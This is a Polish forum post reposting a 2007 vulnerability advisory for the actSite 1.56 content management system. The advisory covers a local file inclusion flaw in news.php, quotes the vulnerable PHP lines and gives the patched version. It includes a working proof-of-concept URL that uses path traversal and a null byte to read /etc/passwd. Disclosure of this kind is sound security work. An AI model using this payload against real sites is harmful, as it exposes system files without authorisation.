Forum Brzeg on
Regulamin Kalendarz Szukaj Album Rejestracja Zaloguj

MegaExpert

Poprzedni temat :: Następny temat
Luka w: actSite 1.56 (news.php) Local File Inclusion Vulner
Autor Wiadomość
yashin 


Wiek: 35
Dołączył: 27 Lut 2007

UP 0 / UP 0



Wysłany: 2007-10-01, 16:57   Luka w: actSite 1.56 (news.php) Local File Inclusion Vulner

Kod:
                         \#'#/

                         (-.-)

   -----------------oOO---(_)---OOo-----------------

   | actSite v1.56 (news.php) Local File Inclusion |

   |                 coded by DNX                  |

   -------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: in phpinc/news.php line 101



         require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";



[!] PoC:

    - http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00



[!] Description:

    - So why we can inject code in a post variable per url? Let's do some research...

      - In phpinc/news.php line 36

          require_once('../config.php');



      - Let's take a look in 'config.php' line 22

        if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");



      - Ok, let's take a look in 'phpinc/inc/csb.php' line 18

        if(getenv('REQUEST_METHOD') == "GET") {

        foreach($_GET as $key => $val) {

            $_POST[$key] =& $_GET[$key];

        }

    }



[!] Solution: Install security update to v1.57
Ostatnio zmieniony przez yashin 2007-10-01, 16:58, w całości zmieniany 1 raz  
0 UP 0 DOWN
 
Wyświetl posty z ostatnich:   
Odpowiedz do tematu
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Nie możesz załączać plików na tym forum
Możesz ściągać załączniki na tym forum
Dodaj temat do Ulubionych
Wersja do druku

Zobacz posty nieprzeczytane

Skocz do:  

Tagi tematu: 56, actsite, file, inclusion, local, luka, news, php, vulner


Powered by phpBB modified by Przemo © 2003 phpBB Group
Template BMan1Blue v 0.6 modified by Nasedo
Strona wygenerowana w 0,04 sekundy. Zapytań do SQL: 19
Nasze Serwisy:









Informator Miejski:

  • Katalog Firm w Brzegu